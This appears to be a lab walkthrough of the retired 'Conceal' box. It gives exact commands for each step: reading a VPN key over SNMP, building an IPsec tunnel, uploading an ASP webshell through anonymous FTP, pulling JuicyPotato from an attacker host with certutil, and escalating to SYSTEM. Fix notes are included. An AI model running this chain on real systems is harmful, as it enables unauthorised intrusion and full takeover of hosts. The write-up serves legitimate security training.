Conceal
Summary
All TCP services on conceal ($TARGET) were hidden behind a host firewall that only permitted traffic arriving inside an IPsec VPN tunnel. The Simple Network Management Protocol service, left open with the default 'public' community string, leaked the VPN pre-shared key inside a MIB entry — a single unauthenticated UDP query bypassed the entire perimeter. With the key in hand, an IKE scan confirmed the exact cipher parameters and a strongSwan tunnel was configured, instantly exposing FTP, HTTP, and SMB.
The FTP service accepted anonymous connections with write access to a subdirectory physically inside the IIS web root; a classic ASP command-execution webshell uploaded there gave remote code execution as the low-privilege IIS account conceal\destitute and exposed the user flag. That account carried SeImpersonatePrivilege — a token right the IIS worker process commonly holds — which the JuicyPotato exploit converted into a SYSTEM shell by coercing a privileged COM server over a local RPC listener, granting full administrative control of the host and the root flag.
Command conventions
The commands below refer to the target by variable rather than by address. Bind them in your shell before running anything; recovered credentials are withheld and shown as [REDACTED: recovered credential].
export TARGET="<retired-instance-ip>"
export ATTACKER_IP="<your-vpn-address>"
export USERNAME="<an-account-name-you-choose>"
export PASSWORD="<a-password-you-choose>"Attack path — how the box was taken
Exact commands 2
sudo nmap -sU -p 161,500 --open $TARGETsnmpwalk -v2c -c public -On $TARGETFixDisable SNMP or enforce SNMPv3 authentication and remove all secrets from MIB dataCritical
Exact commands 1
ike-scan -M --trans=5,2,1,2 $TARGETExact commands 4
sudo tee /etc/ipsec.conf <<'EOF'
config setup
charondebug="ike 1, knl 1, cfg 0"
conn conceal
keyexchange=ikev1
left=%defaultroute
leftauth=psk
right=$TARGET
rightauth=psk
ike=3des-sha1-modp1024
esp=3des-sha1
type=transport
auto=start
EOFecho ': PSK "<SNMP_DERIVED_PSK_HEX>"' | sudo tee /etc/ipsec.secretssudo ipsec restart && sudo ipsec up concealnmap -Pn -sT -p 21,80,135,139,445 $TARGETExact commands 2
curl -T cx2.asp ftp://$USERNAME:$PASSWORD@$TARGET/upload/cx2.aspcurl -sS -G --data-urlencode 'cmd=whoami' "http://$TARGET/upload/cx2.asp"FixDisable anonymous FTP write access and isolate FTP directories from the IIS web rootCritical
Exact commands 2
curl -sS -G --data-urlencode 'cmd=type C:\Users\destitute\Desktop\user.txt' "http://$TARGET/upload/cx2.asp"curl -sS -G --data-urlencode 'cmd=whoami /all' "http://$TARGET/upload/cx2.asp"Exact commands 3
python3 -m http.server 9000curl -sS -G --data-urlencode "cmd=certutil -urlcache -split -f http://$ATTACKER_IP:9000/JuicyPotato.exe C:\Users\Public\jp.exe" "http://$TARGET/upload/cx2.asp"curl -sS -G --data-urlencode 'cmd=C:\Users\Public\jp.exe -l 1444 -t * -p C:\Windows\System32\cmd.exe -a "/c whoami" -c {e60687f7-01a1-40aa-86ac-db1cbf673334}' "http://$TARGET/upload/cx2.asp"FixRemove SeImpersonatePrivilege from the IIS application pool identityCritical
Exact commands 2
curl -sS -G --data-urlencode 'cmd=C:\Users\Public\jp.exe -l 1444 -t * -p C:\Windows\System32\cmd.exe -a "/c type C:\Users\Administrator\Desktop\root.txt > C:\Users\Public\root.txt" -c {e60687f7-01a1-40aa-86ac-db1cbf673334}' "http://$TARGET/upload/cx2.asp"curl -sS -G --data-urlencode 'cmd=type C:\Users\Public\root.txt' "http://$TARGET/upload/cx2.asp"Attack patterns used
The transferable techniques behind this compromise.
SeImpersonate Abuse (Potato family)Windows · Privilege EscalationT1134.002
What it is
Service accounts (IIS, MSSQL, etc.) often hold SeImpersonatePrivilege. The 'Potato' exploits (JuicyPotato, RoguePotato, PrintSpoofer, GodPotato, JuicyPotatoNG) coerce a SYSTEM process to authenticate to an externally controlled COM/RPC/named-pipe endpoint, then impersonate that SYSTEM token — escalating from the service account to NT AUTHORITY\SYSTEM.
Why it works
Holding SeImpersonate is normal for service accounts, but Windows' token-impersonation model lets it be turned into full SYSTEM via local authentication coercion. Remediate by removing the privilege where unneeded and keeping hosts patched against the specific coercion vectors.
Read more
Exposed services
| 21/tcp | ftp |
| 80/tcp | http syn-ack |
| 135/tcp | msrpc syn-ack |
| 139/tcp | netbios-ssn syn-ack |
| 445/tcp | microsoft-ds syn-ack |
| 49664/tcp | unknown syn-ack |
| 49665/tcp | unknown syn-ack |